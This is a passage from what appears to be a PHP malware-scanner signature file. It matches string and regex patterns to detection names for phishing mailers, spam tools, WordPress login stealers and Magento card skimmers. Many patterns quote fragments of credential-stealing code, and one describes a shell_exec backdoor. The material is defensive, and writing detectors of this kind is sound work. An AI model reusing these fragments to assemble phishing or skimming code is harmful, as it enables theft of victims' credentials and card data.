			'$subject=\'Wordpress Pass' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.cms_credentials_stealer.011', '\$\w+\s*=\s*.[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}.\s*;\s*\$\w+\s*=\s*.http:\/\/.\.\$_SERVER\s*\[.HTTP_HOST.\]\.\$_SERVER\[.PHP_SELF.\]\s*;\s*\$subject\s*=\s*.[Ww]ord[Pp]ress\s*[Pp]ass[^\$]+\$\w+\s*;\s*[^\2]+admin_path\s*=\s*.\.\$url\..\s*name\s*=\s*.\.\$_POST\[.\w+.\]\..\s*password\s*=\s*.\.\$_POST\[[^\@]+\@mail\s*\(\$to,\s*\$subject,\s*\$body,\s*\$headers\s*\);'),
			'= "$subj \n\nLOGIN DETAILS' => array(STR_CLEARFILE, 'php.phishing.mailer.061', NULL),
			'$subject = "[".$ip_address."] New Login (".$date.")' => array(STR_CLEARFILE, 'php.phishing.mailer.063', NULL),
			'<title>Account Confirmation' => array(STR_CLEARFILE, 'php.phishing.generic.060', NULL),
			';if (top.location != location) {top.location.href = document.location.href;}</script>' => array(STR_CLEARFILE, 'php.phishing.mailer.065', NULL),
			'$msgbank = \'<html><head><style>' => array(STR_CLEARFILE, 'php.phishing.mailer.069', NULL),
			'if(isset($_SESSION[\'xsenderid\']))' => array(STR_CLEARFILE, 'php.hacktool.xsender_mailer.001', NULL),
			'$subject = "Westpac Result Received' => array(STR_CLEARFILE, 'php.phishing.mailer.080', NULL),
			'centurylink.com' => array(STR_CLEARFILE, 'php.phishing.mailer.128', NULL),
			'<H2>PR1V8 M4IL3R BY' => array(STR_CLEARFILE, 'php.hacktool.mailer.158', NULL),
			'$_POST[\'Manda\']' => array(STR_CLEARFILE, 'php.mailer.post_manda.001', NULL),
		),

		'header("Location:' => array(STR_TRIGGER,

			'json_decode(file_get_contents(' => array(STR_TRIGGER,
				'gethostbyaddr($ip);' => array(STR_TRIGGER,
					'->country;' => array(STR_CLEARFILE, 'php.phishing.mailer.114', NULL),
				),
			),

			'header("Location: http://mail.daum.net' => array(STR_TRIGGER,
				'Email: $user\n Pass: $pass\nip: $ip' => array(STR_CLEARFILE, 'php.phishing.mailer.044', NULL),
			),

			'header("Location: success.php?email=$email");' => array(STR_TRIGGER, 
				'mail($email,$emailsubjectuser,$emailuseremail,$useremailheaders);' => array(STR_CLEARFILE, 'php.phishing.mailer.021', NULL),
			),

			'header("Location:http://mail.aol.com' => array(STR_TRIGGER,
				'mail($bilsnd,$bilsub,$bilsmg,$bilhead);' => array(STR_CLEARFILE, 'php.phishing.mailer.026', NULL),
			),

			'.$name.\' <\'.$emailTo.\'>' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mailer.090', 'if\(isset\(\$_POST\[.submist_common\'\]\)\)\s*\{\s*[^_]+_POST\[.your-name[^\{]+\{\s*\$thank_you=[^;]+\;\s*\}[^\[]+\[.email_to[^<]+<..\$emailTo[^;]+;\s*mail\(\$emailTo,[^\)]+\);\s*[^=]+=\s*true;\s*header\(.Location:\s*\$thank_you.\);\s*\}'),
			'$message .= "~~~~~~' => array(STR_CLEARFILE, 'php.phishing.mailer.010', NULL),
			'$msg .= "Card No:' => array(STR_CLEARFILE, 'php.phishing.mailer.012', NULL),
			'Number card: $cc' => array(STR_CLEARFILE, 'php.phishing.mailer.013', NULL),
			'Cvv: ".$_POST[\'cvv\']."' => array(STR_CLEARFILE, 'php.phishing.mailer.017', NULL),
			'.= "Password : ".$_POST[\'pass' => array(STR_CLEARFILE, 'php.phishing.mailer.029', NULL),
			'$subj = "PIN: $number3 | $ip"' => array(STR_CLEARFILE, 'php.phishing.mailer.049', NULL),
			'$subj = "LOGIN-BOI:' => array(STR_CLEARFILE, 'php.phishing.mailer.049.02', NULL),
			'$subject = "GOOD | $number1 | $ip"' => array(STR_CLEARFILE, 'php.phishing.mailer.049.03', NULL),
			'trim (strip_tags (stripslashes ($_POST[\'passcode\'])));' => array(STR_CLEARFILE, 'php.phishing.mailer.056', NULL),
			'RaiffeisenbankHU' => array(STR_CLEARFILE, 'php.phishing.mailer.029.02', 'NULL'),
		),

		'mail($to, $subject, $' => array(STR_TRIGGER,

	
			'echo "good";' => array(STR_TRIGGER,
				'$headers .= \'Content-Type: text/plain; charset=iso-8859-1\' . "\r\n";' => array(STR_CLEARFILE, 'php.mailer.echo_good.001', NULL),
			),
	
			';} else {echo' => array(STR_TRIGGER,
				'foreach($_POST as $' => array(STR_CLEARFILE, 'php.hacktool.mailer.164', NULL),
			),

			'$message .=\'Card number:\'' => array(STR_CLEARFILE, 'php.phishing.mailer.011', NULL),
			'echo \'God\';' => array(STR_CLEARFILE, 'php.phishing.mailer.060', NULL),
		),

		'"==Multipart_Boundary_x{$semi_rand}x";' => array(STR_TRIGGER,
			'$rec	= $_GET[\'to\'];' => array(STR_CLEARFILE, 'php.hacktool.virus_mailer.001', NULL),
			'Idea Conceived By coolsurfer@gmail.com' => array(STR_CLEARFILE, 'php.hacktool.generic.010', NULL),
		),

		'geoplugin_countryName' => array(STR_TRIGGER,
			'HTTP_USER_AGENT' => array(STR_TRIGGER,
				'$password' => array(STR_CLEARFILE, 'php.phishing.mailer.111', NULL),
			),
		),

		'function smtpmail($host, $port, $smtp_login' => array(STR_TRIGGER,
			'<$email_polucha>" . $end_zag;' => array(STR_CLEARFILE, 'php.hacktool.mailer.042', NULL),
		),

		'header("location: $indexx");' => array(STR_TRIGGER,
			'.= "Pwd' => array(STR_CLEARFILE, 'php.phishing.mailer.016', NULL),
		),

		'$redir_url = "http://' => array(STR_TRIGGER,
			'"Reply-To: {$_POST[\'reply_to\']}\r\n";' => array(STR_CLEARFILE, 'php.phishing.mailer.043', NULL),
		),

		'if(strlen($data[\'cc_number' => array(STR_TRIGGER,
			'$this->testReview($data);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.047', 'protected function testReview..data.\s*\{\s*if.strlen..data..cc_number[^\}]+mail\(\$to[^\)]+\);\s*\}\s*\}|\$this->testReview.\$data\);'),
		),
		
		'if(mail($recipient, $subject, $message, $headers))' => array(STR_TRIGGER,
			'else{return "BAD!";}' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.006', NULL),
		),

		'$SANDY_HASH = md5("$Destination+$SandyKey");' => array(STR_CLEARFILE, 'php.mailer.Sandy.002', NULL),
		'.= "Message-ID: <".md5(uniqid(time()))."@mailer' => array(STR_CLEARFILE, 'php.mailer.generic.024', NULL),
		'$headers = base64_decode($_POST["headers"]);' => array(STR_CLEARFILE, 'php.hacktool.mailer.027', NULL),
		'$email_polucha,' => array(STR_CLEARFILE, 'php.mailer.POST.012', NULL),
		'if(smtpmail("test@yandex.ru", "dsfgd", "sgasg", $headers=\'\')' => array(STR_CLEARFILE,'php.mailer.REQUEST.002', NULL),
		'$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));' => array(STR_CLEARFILE, 'php.hacktool.mailer_gen.001', NULL),
		'echo "<script>window.alert(\"$numemails_a emails sent!\"); history.back(-1);' => array(STR_CLEARFILE, 'php.hacktool.mailer.038', NULL),
		'echo (": inb0x : $domain !");' => array(STR_CLEARFILE, 'php.hacktool.mailer.046', NULL),
		'$IP = pack("H*", substr(strpos($COOKIE_VARS,' => array(STR_CLEARFILE, 'php.hacktool.mailer.080', NULL),
		'<p>PHP MAILER INBOX' => array(STR_CLEARFILE, 'php.hacktool.mailer.065', NULL),
		'mail($check_email.$this->check,"=?UTF-8?B?".base64' => array(STR_CLEARFILE, 'php.phishing.mailer.027', NULL),
		'$GUT = mail($empfaenger, $betreff, $nachricht, $header);' => array(STR_CLEARFILE, 'php.hacktool.mailer.020', NULL),
		'<? if($_POST[\'Send\']) { ?>' => array(STR_CLEARFILE, 'php.hacktool.mailer.066', NULL),
		'$headers = "From: Holygrail Inc.' => array(STR_CLEARFILE, 'php.mailer.holygrain.001', NULL),
		'$usr="info".$rand;' => array(STR_CLEARFILE,'php.mailer.POST.041', NULL),
		'$subject = $_SERVER[\'SCRIPT_URI\']' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mail_tester.005', 'if\s*\(isset\(\$_REQUEST\[\d+\]\)\)\s*{\s*if\s*\(md5\(\$_REQUEST\[\d+\]\)=+[\'"]\w+[\'"]\)\s*{\s*print_r\(shell_exec\(\$_REQUEST[^}]+}\s*}\s*ini_set[^\$]+(\$\w+)\s*=\s*[\'"]\w+[\'"]\s*;\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*\$_SERVER\[[\'"]SCRIPT_URI[\'"]\]\s*;\s*(\$\w+)\s*=[^;]+;\s*(\$\w+)\s*=\s*[\'"][Ff]rom:[\'"]\s*\.\s*\1\s*;\s*if\s*\(mail\(\2\s*,\s*\3\s*,\s*\4\s*,\s*\5\)\)\s*{\s*header\([\'"]HTTP[^;]+;\s*}'),
		'$subject = "Your Apple ID was used' => array(STR_CLEARFILE, 'php.phishing.mailer.088', NULL),
		'time().\'|\'.$data[\'cc_number\']' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.097', 'protected[\s]*function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*if\(strlen\(\$[\w]+\[.[\w]+.\]\)[\s]*>[\s]*[\d]\)[\s]*\{[^>]+\$this->[^\}]+mail\([^;]+\);[\s\}]+'),
	),

	'passw' => array(STR_TRIGGER,

		'header' => array(STR_TRIGGER,

			'$_POST[\'email\']." ".$_POST[\'password\']' => array(STR_TRIGGER,
				'$response = mail($to,$subject,$' => array(STR_CLEARFILE, 'php.phishing.opensrs.001', NULL),
			),

			'header("Location: https://docs.google.com/templates?type=spreadsheets&' => array(STR_CLEARFILE, 'php.phishing.gmail.007', NULL),
			'header( "Location: index.php?Email=$username&.rand=13InboxLight.aspx?n' => array(STR_CLEARFILE, 'php.phishing.gmail.009', NULL),
			'header("Location: http://parcel.dhl.co.uk")' => array(STR_CLEARFILE, 'php.phishing.DHL.002', NULL),
			'header("Location: signInAction.do.error.html?error=$login");' => array(STR_CLEARFILE, 'php.phishing.westernunion.001', NULL),
			'<h2>WordPress Emergency PassWord Reset</h2>' => array(STR_CLEARFILE, 'php.hacktool.wp-epr.001', NULL),
			'?rand=13InboxLightaspxn.' => array(STR_CLEARFILE, 'php.phishing.mailer.028', NULL),
			'.$_POST[\'log\']."-------password=".$_POST[\'pwd\'].' => array(STR_CLEAR_MULTIMATCH, 'php.malware.wp_login_stealer.001', '\$ip = ._SERVER..REMOTE_ADDR..;\s*\$to=[^;]+;\s*\$url[^;]+;[^\[\{]+\.\$_POST\[.log.\]\."-------password="\.._POST..pwd.\][^;]+;\s*\$headers[^@(]+@mail.\$to, .subject, .body, .headers\);'),
			'alexusMailer' => array(STR_CLEARFILE, 'php.hacktool.mailer.053', NULL),
			'<title>@Mailer' => array(STR_CLEARFILE, 'php.hacktool.mailer.057', NULL),
			'Rez by [ bajatax' => array(STR_CLEARFILE, 'php.malware.login-stealer.004', NULL),
			'header("Location:  http://www.live.com")' => array(STR_CLEARFILE, 'php.phishing.hotmail.007', NULL),
			'header("Location: https://www.linkedin.com/' => array(STR_CLEARFILE, 'php.phishing.mailer.108', NULL),
		),

		'$smail=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']."|".$this->request->post[\'username' => array(STR_CHAIN_TRIGGER,
			'$smail=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']."|".' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.cms_credentials_stealer.008', '\$smail[\s]*=[\s]*\$_SERVER\[.HTTP_HOST.\][\s]*\.[\s]*\$_SERVER\[.REQUEST_URI.\][\s]*\.[^\$]+\$this->request->post\[.username[^;]+\];[\s]*mail\([^;]+Reply-to:[^;]+\);(\s*\})?'),
			'html_entity_decode($this->request->post[\'password' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.cms_credentials_stealer.008.02', 'if\(\$this->user->login\(\$this->request->post\[.username.\],[\s]*html_entity_decode\(\$this->request->post\[.password.[^{]+\{'),
		),

		'$multipart .= chunk_split(base64_encode($html));' => array(STR_CLEARFILE, 'php.hacktool.mailer.089', NULL),
		'getenv("REMOTE_ADDR");$isi="Ip : $ip\nUsermail: $username\nPassword' => array(STR_CLEARFILE, 'php.hacktool.magento-credential-stealer.005', NULL),
		'$msg = "Username: $userID\nPassword : $password\nCard Number : $cardNumber\n' => array(STR_CLEARFILE, 'php.phishing.mailer.001', NULL),
		'$mmn = $_POST[\'mmn\'];' => array(STR_CLEARFILE, 'php.phishing.mailer.002', NULL),
		'$pfw_subject = "DOPE' => array(STR_CLEARFILE, 'php.phishing.mailer.003', NULL),
		'Xclusiv-3D' => array(STR_CLEARFILE, 'php.phishing.Xclusiv_3D_mailer.004', NULL),
		'.$_POST[\'password\']."\r\n Domain: ".$domainmail.' => array(STR_CLEARFILE, 'php.phishing.mailer.007', NULL),
		'$mailsubj = "| Login: | $email | $password' => array(STR_CLEARFILE, 'php.phishing.mailer.045', NULL),
		'"Xoom Password: ".$_POST[' => array(STR_CLEARFILE, 'php.phishing.xoom.001', NULL),
		'deleteCookie("BusinessPasswd", "/", "webmail.hinet.net" );' => array(STR_CLEARFILE, 'js.phishing.hinet.001', NULL),
		'<tr><td>Password: $passwd</td></tr>' => array(STR_CLEARFILE, 'php.phishing.mailer.024', NULL),
		'$subj = "Infos 3: $ip / $password";' => array(STR_CLEARFILE, 'html.phishing.apple.001.004', NULL),
		'@$Confirmpassword = addslashes($_POST[\'Confirmpassword\']);' => array(STR_CLEARFILE, 'php.phishing.confirmpassword.001', NULL),
		' content="0;url=http://windows.microsoft.com/en-us/outlook/' => array(STR_CLEARFILE, 'php.phishing.hotmail.006', NULL),
		'dataString = \'username=\'+username+\'&password=\'+password' => array(STR_CLEARFILE, 'js.phishing.generic.006', NULL),
	),

	'<title>' => array(STR_TRIGGER,

		'?> Webmail Security Systems' => array(STR_TRIGGER,
			' ?>/favicon.ico"' => array(STR_CLEARFILE, 'php.phishing.webmail.001', NULL),
		),

		'error_reporting(0)' => array(STR_TRIGGER,
			'<title> Email sending tester</title>' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.003', NULL),
		),

		'<title>FormMail v' => array(STR_WHITE,
			'<title>\S+[Mm][Aa][Ii][Ll](?:[Ee][Rr])?\s*v\d+(?:\.\d+)?\s*<\/title>' => array(REX_CLEARFILE, 'php.hacktool.mailer.098', NULL),
		),

		'<title>paranoyou test mail' => array(STR_CLEARFILE, 'php.hacktool.mailer.083', NULL),
		'<title>Fakemailer PRO' => array(STR_CLEARFILE, 'php.hacktool.mailer.076', NULL),
		'<title>shields.su PHPMailer' => array(STR_CLEARFILE, 'php.mailer.shields.001', NULL),
		'<title>*RRS* BY BCTEAM 2015' => array(STR_CLEARFILE, 'php.phishing.rrb.001', NULL),
		'<title>SenderMail' => array(STR_CLEARFILE, 'php.hacktool.mailer.007', NULL),
		'<title>:: MAILER ::</title>'=> array(STR_CLEARFILE, 'php.hacktool.mailer.010', NULL),
		'<title>Sending M-9AWED' => array(STR_CLEARFILE, 'php.hacktool.mailer-M-9AWED.001', NULL),
		'<title>Upload a copy of your credit card' => array(STR_CLEARFILE, 'php.phishing.mailer.019', NULL),
		'<title>WebRoot Hack Tools</title>' => array(STR_CLEARFILE, 'php.hacktool.webroot.001', NULL),
		'<title>wilhelm.tel Webmail :: wilhelm.tel Webmail<' => array(STR_CLEARFILE, 'html.phishing.wilhelm_tel.001', NULL),
		'<title>LaymenoS' => array(STR_CLEARFILE, 'php.hacktool.mailer.043', NULL),
		'<title>Smart Mailer' => array(STR_CLEARFILE, 'php.hacktool.mailer.044', NULL),
		'<title>.: Wahib Mkadmi Priv8' => array(STR_CLEARFILE, 'php.hacktool.mailer.045', NULL),
		'<title>.: Dr Spam' => array(STR_CLEARFILE, 'php.hacktool.mailer.082', NULL),
		'Spyus ANH Mailer' => array(STR_CLEARFILE, 'php.hacktool.mailer.060', NULL),
		'$yuh = ucfirst($yuh);' => array(STR_CLEARFILE, 'php.phishing.generic.045', NULL),
		'<title>Sender Anony' => array(STR_CLEARFILE, 'php.hacktool.mailer.062', NULL),
		'<title>Excel Online' => array(STR_CLEARFILE, 'php.phishing.excel.001', NULL),
		'<title>Spammer\'s Mail' => array(STR_CLEARFILE, 'php.hacktool.mailer.092', NULL),
		'Dropbox Business</title>' => array(STR_CLEARFILE, 'html.phishing.dropbox.009', NULL),
		'N3TWAR SPAMMER' => array(STR_CLEARFILE, 'php.hacktool.mailer.132', NULL),
	),

	'$subject' => array(STR_TRIGGER,

		'HTTP_USER_AGENT' => array(STR_TRIGGER,

			'Content-Type' => array(STR_TRIGGER,
				'isnotbottoruser() && $sendtoemail' => array(STR_CLEARFILE, 'php.phishing.mailer.103', NULL),
				'function kirim_mail($' => array(STR_CLEARFILE, 'php.hacktool.mailer.150', NULL),
			),

			'$headers = "From:' => array(STR_TRIGGER,
				'$_SESSION[\'password\'] = $' => array(STR_CLEARFILE, 'php.phishing.mailer.067', NULL),
			),
		),

		'(isset($_SERVER[' => array(STR_TRIGGER,

			'json_decode(file_get_contents(' => array(STR_TRIGGER,
				'if (isset($_POST[\'email' => array(STR_CLEARFILE, 'php.hacktool.mailer.147', NULL),
			),

			'$link = (isset($_SERVER[\'HTTPS\']) && $_SERVER[\'HTTPS\'] === \'on\' ? "https" : "http")' => array(STR_CLEARFILE, 'php.hacktool.mailer.135', NULL),
		),

		'\$_POST\[.body.\];' => array(REX_TRIGGER,
			'echo \'good\';' => array(STR_CLEARFILE, 'php.mailer.POST.040', NULL),
		),

		'getenv(' => array(STR_TRIGGER,
			'substr(md5(uniqid(rand()))' => array(STR_CLEARFILE, 'php.phishing.mailer.086', NULL),
		),

		'$web="$_SERVER[HTTP_HOST]";' => array(STR_TRIGGER,
			'$email = "Check@$web";' => array(STR_CLEARFILE, 'php.hacktool.mailer.131', NULL),
		),

		'meta http-equiv="refresh' => array(STR_TRIGGER,
			'htmlspecialchars($_POST[\'password' => array(STR_CLEARFILE, 'php.phishing.mailer.129', NULL),
		),

		'echo "$mail\n";' => array(STR_TRIGGER,
			'if (mail($mail, $subject, $letter, $headers))' => array(STR_CLEARFILE, 'php.hacktool.mailer.140', NULL),
		),

		'$headers .= "From' => array(STR_TRIGGER,
			'var data = "ajax=1&from=' => array(STR_CLEARFILE, 'php.hacktool.mailer.141', NULL),
		),

		'$subject = "Notice !";' => array(STR_TRIGGER, 
			'$body = loadini("' => array(STR_CLEARFILE,'php.mailer.POST.034', NULL),
		),

		'Dr.Inj3ction' => array(STR_CLEARFILE, 'php.hacktool.mailer.120', NULL),
		'Civilian Shell' => array(STR_CLEARFILE, 'php.hacktool.mailer.122', NULL),
		'$data = "\r\nAddress: $address Account: $username Password:' => array(STR_CLEARFILE, 'php.phishing.mailer.122', NULL),
		'if(mail($TO, "".$subject."".$dataHora.$x1.$email[$i], $message, $headers' => array(STR_CLEARFILE, 'php.hacktool.mailer.050', NULL),
		'$subject = "STRIPE LOGIN | ".$ip' => array(STR_CLEARFILE, 'php.phishing.stripe_mailer.001', NULL),
		'$subject = "Gmail - ".$country;' => array(STR_CLEARFILE, 'php.mailer.generic.015', NULL),
		'$subject = "Hotmail Results | $ip | ".$_POST[\'Email\'];' => array(STR_CLEARFILE, 'php.phishing.hotmail.002', NULL),
		'$subject = "# Nobody # $user | $ip";' => array(STR_CLEARFILE,'php.phishing.mailer.014', NULL),
	),

	'-----' => array(STR_TRIGGER,

		'echo "<script>location.replace(' => array(STR_TRIGGER,
			'$msg .= "user: ".$_POST[\'user\']."\n";' => array(STR_CLEARFILE, 'php.phishing.mailer.050', NULL),
		),

		'=\'----------\'.strtoupper(dechex(rand(' => array(STR_CLEARFILE, 'php.hacktool.mailer.068', NULL),
		'print $ok ? \'OK\' : \'FAIL\';' => array(STR_CLEARFILE, 'php.mailer.POST.036', NULL),
		'$msg .= "---------------------- By Hack' => array(STR_CLEARFILE,'php.mailer.POST.028', NULL),
		'-----lloyds-----' => array(STR_CLEARFILE, 'html.phishing.Lloyds.003', NULL),
		'msg = "--------------------- Bismillah --' => array(STR_CLEARFILE, 'php.phishing.AXA.002', NULL),
		'$data = "----------Apple ID/Password Result' => array(STR_CLEARFILE, 'php.phishing.mailer.022', NULL),
		'$sad=md5($ema[$i]);' => array(STR_CLEARFILE, 'php.hacktool.mailer.048', NULL),
		'[SilentAngel]' => array(STR_CLEARFILE, 'php.hacktool.mailer.067', NULL),
	),

	'$subj =' => array(STR_TRIGGER,

		'$msg =' => array(STR_TRIGGER,
			'$ip = getenv(' => array(STR_TRIGGER,

				'fopen(' => array(STR_TRIGGER,
					'header("Location:' => array(STR_CLEARFILE, 'php.mailer.generic.033', NULL),
					'Header ("Location:' => array(STR_CLEARFILE, 'php.mailer.generic.033.02', NULL),
				),

				'$password = $_POST[\'password\'];' => array(STR_CLEARFILE, 'php.phishing.mailer.057', NULL),
				'window.location="https://onlineservices.etisalat.ae/scp/open/quickpayandrecharge/quickPayAndRecharge.jsp"' => array(STR_CLEARFILE, 'html.phishing.etisalat.002', NULL),
				'$passwd = $_POST[\'passwd\'];' => array(STR_CLEARFILE, 'php.phishing.mailer.078', NULL),
				'$crd = $_POST[\'crd\'];' => array(STR_CLEARFILE, 'php.phishing.mailer.094', NULL),
				'$passwd = $_POST[\'password\'];' => array(STR_CLEARFILE, 'php.phishing.mailer.104', NULL),
				'stripslashes(ucfirst($addr_details[' => array(STR_CLEARFILE, 'php.mailer.generic.036', NULL),
			),
		),

		'$subj = "| Verizon | $ip |";' => array(STR_CLEARFILE, 'html.phishing.verizon.002', NULL),
	),

	'mail(stripslashes' => array(STR_TRIGGER,

		'if(isset($_POST["to_address"]))' => array(STR_TRIGGER,
			'404 error' => array(STR_CLEARFILE, 'php.hacktool.mailer.074', NULL),
		),

		'base64_decode(' => array(STR_TRIGGER,
			'{echo \'not found\';}' => array(STR_CLEARFILE, 'php.hacktool.mailer.081', NULL),
		),

		'base64_decode(base64_decode(base64_decode($strings[' => array(STR_TRIGGER,
			'mail(stripslashes($' => array(STR_CLEARFILE, 'php.hacktool.spamtool.004', NULL),
		),

		'echo base64_encode(\'error : \'.$result);' => array(STR_CLEARFILE, 'php.mailer.POST.010', NULL),
		'foreach \(\$_POST as \$key => \$value\) \{array_push\(\$data, \$value\);\}' => array(REX_CLEAR_MULTIMATCH, 'rex.spamtool.002', '(\$\w+)\s*=\s*array[^\}]+array_push\(\1,\s*(\$\w+)[^\{]+((\$\w+\s*=\s*stripslashes\((base64_decode\(){2}\1\[\d+\]\s*\)\)\);)){1,}[^;]+mail\((stripslashes\(\$\w+\), ){2,}stripslashes\(\$\w+\)\);\s*echo\s*\$\w+;'),
		'\$\w+ = mail.(stripslashes..\w+., ){2,3}stripslashes..\w+..;' => array(REX_CLEAR_MULTIMATCH, 'rex.spamtool.001', '(?:\$\w+\s*=\s*stripslashes\((?:base64_decode\()*\$_POST[^\;]+;\s*){3,4}\s*(\$\w+)\s*=\s*mail.(?:stripslashes.\$\w+.,\s*){2,3}stripslashes.\$\w+..;\s*if.\1[^}]+echo[^}]+}[\s]*else[\s]*[^}]+echo[^;]+;[\s]*}'),
		'<\?php[\s]*$tranta = mail(stripslashes($_POST[\'cliento\']), stripslashes($_POST[\'ticketvar' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mailer.094', '\$tranta = mail\(stripslashes\(\$_POST\[.cliento[^;]+;[\s]*if\(\$tranta\)[\s]*\{[\s]*echo[^{]+else[\s]*\{echo[^;]+;[\s]*\}'),
	),

	'[^\w]mail\((\$[\w]+,[\s]*){2,}[^\)]*\);' => array(REX_TRIGGER,
		'passw' => array(STR_TRIGGER,

			'REMOTE_ADDR' => array(STR_TRIGGER,
	
				'if (isset($_SERVER[\'HTTP_X_FORWARDED_FOR' => array(STR_TRIGGER,
					'$_POST[\'username\']' => array(STR_CLEARFILE, 'php.phishing.mailer.096', NULL),
				),
	
				'$msg' => array(STR_TRIGGER,
					'echo json_encode($data);' => array(STR_CLEARFILE, 'php.phishing.mailer.048', NULL),
				),
			),
		),

		'From:' => array(STR_TRIGGER,
			'$_POST[' => array(STR_TRIGGER,
				'$subject= $_POST["subject' => array(STR_CLEARFILE, 'php.hacktool.mailer.162', NULL),
			),
		),

		'$back=$_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];' => array(STR_CLEARFILE, 'php.hacktool.mailer.145', NULL),
		'document.location.href="https://outlook.office' => array(STR_CLEARFILE, 'php.hacktool.mailer.149', NULL),
	),

	'$_SERVER[\'SERVER_NAME\']' => array(STR_TRIGGER,

		'phpversion();' => array(STR_TRIGGER,
			'php_uname();' => array(STR_TRIGGER,
				'mail($_POST[' => array(STR_TRIGGER,
					'gethostbyname($_SERVER[\'SERVER_NAME\']);' => array(STR_CLEARFILE, 'php.hacktool.mailer.138', NULL),
				),
			),
		),


		'$url, \'From:' => array(STR_TRIGGER,
			'$url = (!empty($_SERVER[\'HTTPS\'])) ? "https://".$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'] : "http://".$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];' => array(STR_CLEARFILE, 'php.hacktool.mailer.163', 'NULL'),
		),

		'\$[\w]+[\s]*.=[\s]*\$[\w]*[\s]*=[\s]*\$_SERVER\[.SERVER_NAME.\].\$_SERVER\[.PHP_SELF.\]...n.;[\s]*\$[\w]+[\s]*=[\s]*mail\(\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+\);[\s]*if\(\$[\w]+\)[\s]*echo[\s]*.[^;]+;[\s]*else[\s]*echo[\s]*[^;]+>.;' => array(REX_CLEARFILE, 'php.hacktool.mailer.117', NULL),
		'.$_SERVER[\'SERVER_NAME\']."".$_SERVER[\'REQUEST_URI\']."\nInfo' => array(STR_CLEARFILE, 'php.hacktool.mailer.160', NULL),
	),

	'<input type="text" name="email" value=' => array(STR_TRIGGER,
		'if (!empty($_GET[\'email\'])){' => array(STR_CLEARFILE, 'php.hacktool.mailer.093', NULL),
		'if (!empty($_POST[\'email\'])){' => array(STR_CLEARFILE, 'php.hacktool.mailer.093.02', NULL),
		'if(@checkdnsrr(array_pop(explode("@",$email)),"MX")){return true;}' => array(STR_CLEARFILE, 'php.hacktool.mailer.130', NULL),
	),

	'file_get_contents(' => array(STR_TRIGGER,
		'getenv(\'REMOTE_ADDR\')' => array(STR_TRIGGER,
			'substr($send' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.005.02', '\$send[\s]*=[\s]*array[\s]*\([\s]*.PaymentMethod[^;]+\);[\s]*foreach[\s]*\(\$send[^}]+\}[\s]*\$datasend[^>]+>geoplugin_city[^}]+(\$[\w]+[\s]*=[\s]*curl_init\(\);[^>]+curl_close\(\$[\w]+\);|mail\(\$[^;]+\);)'),
			'".$data[\'cc_type\']." ".$' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.087', '(\$\w+)\s*=\s*array\([\'"]PaymentMethod[\'"]\s*=>\s*(\$\w+)\[.\w+.\],\s*.Billing\s*Name.\s*=>\s*\$\w+->getQuote[^\2]+\1,[^\(]+getenv\(.REMOTE_ADDR.\)\s*;\s*(\$\w+)\s*=\s*json_decode\(file_get_contents\([\'"][^\$]+\3}[\'"]\)\);[^\[]+\[.cc_number.\],[^;]+;\s*(\$\w+)\s*=[^\$]+\.\2\[.cc_type.\][^;]+;\s*(\$\w+)\s*=\s*[\'"]MIME-Version:[^\$]+(\$\w+)\s*=\s*array\([^\$]+(\$\w+)\s*=\s*\6\[[^;]+;\s*mail\(\7,\s*\4,\s*\$\w+,\s*\5\)\s*;'),
		),
	),

	'getenv("REMOTE_ADDR");' => array(STR_TRIGGER,
		'.$_POST[' => array(STR_TRIGGER,
			'\$[\w]+[\s]*\.=[\s]*.[\w]+.*?\$_POST\[.[\w]+.\]\...n.;[^\}]+mail\(.([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}).[\s]*,' => array(REX_CLEARFILE, 'php.phishing.mailer.109', NULL),
			'\$[\w]+[\s]*=[\s]*getenv\(.REMOTE_ADDR.\);[^;]+gethostbyaddr\(\$[\w]+\)[^>]+mail\(\$[\w]+,[^:]+From:[\s]*[\w]+<[^<]+<META[\s]*http-equiv=.refresh.[^>]+>.\);' => array(REX_CLEARFILE, 'php.phishing.mailer.110', NULL),
		),
	),

	'base64_decode(' => array(STR_TRIGGER,
		'echo[\s]*\'[\w]+\'[\s]*;[\s]*\}[\s]*else[\s]*\{[\s]*echo[\s]*\'[\w]+[\s]*:' => array(REX_CLEARFILE, 'php.hacktool.mailer.114', NULL),
		'_mb_mime_encode($subject' => array(STR_CLEARFILE, 'php.hacktool.mailer.123', NULL),
	),

	'<title>Loading...' => array(STR_TRIGGER, 
		'if(count($_COOKIE)){foreach(array_keys($_COOKIE) as $value){unset($_REQUEST[$value]);}}' => array(STR_TRIGGER, 
			'function build_message($request_input){if(!isset($message_output)){$message_output =""' => array(STR_CLEARFILE,'php.mailer.POST.035', NULL, 1),
		),
	),

	'echo \'1\';' => array(STR_TRIGGER,
		'if(function_exists("mail"))' => array(STR_TRIGGER,
			'Mail Working!\');' => array(STR_CLEARFILE, 'php.hacktool.mailer.126', NULL),
		),
	),

	'print \'*send:bad*' => array(STR_TRIGGER,
		'print \'*rbl:ok*' => array(STR_CLEARFILE, 'php.hacktool.spamtool.003', NULL),
	),

	'foreach($mails as $mail)' => array(STR_TRIGGER,
